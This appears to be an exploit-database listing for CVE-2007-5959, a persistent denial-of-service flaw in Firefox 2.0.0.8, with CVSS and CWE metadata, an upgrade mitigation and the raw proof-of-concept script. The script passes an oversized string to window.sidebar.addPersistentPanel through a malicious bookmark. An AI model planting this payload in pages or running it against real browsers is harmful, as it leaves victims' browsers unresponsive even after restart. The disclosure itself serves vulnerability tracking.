header-logo
Suggest Exploit
vendor:
Firefox
by:
Unknown
7.5
CVSS
HIGH
Denial of Service
399
CWE
Product Name: Firefox
Affected Version From: 2.0.0.8
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2007-5959
CPE: a:mozilla:firefox:2.0.0.8
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-1082/https://www.rapid7.com/db/vulnerabilities/mfsa2007-38-cve-2007-5959/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-1084/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2007-5959/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2007-1082/https://www.rapid7.com/db/vulnerabilities/mozilla-seamonkey-cve-2007-5959/https://www.rapid7.com/db/vulnerabilities/suse-cve-2007-5959/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-f1f6f6da-9d2f-11dc-9114-001c2514716c/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-1083/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2007-1084/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2007-1083/
Other Scripts:
Platforms Tested: All
2007

Persistent Denial of Service in Mozilla Firefox

The vulnerability in Mozilla Firefox allows for a persistent denial of service attack. This can be achieved by setting a malicious bookmark and then following it. Once successful, the browser will stop responding to all URI requests. Even after restarting the browser, the condition persists.

Mitigation:

Upgrade to a non-vulnerable version of Mozilla Firefox. As of this writing, version 2.0.0.8 is confirmed to be vulnerable.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26216/info

Mozilla Firefox is prone to a vulnerability that results in a persistent denial of service.

This issue occurs when a victim sets a malicious bookmark and then follows it.

Successful attacks will cause Firefox to stop responding to all URI requests.

NOTE: This condition persists even after the browser is restarted.

Mozilla Firefox 2.0.0.8 is vulnerable; other versions may also be affected. 

<script>



window.sidebar.addPersistentPanel('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRGGHH!

...and more AA\'s!:)',

'http://www.example.com','\0');



</script>

Navigation

Suggest Exploit

Services By CQR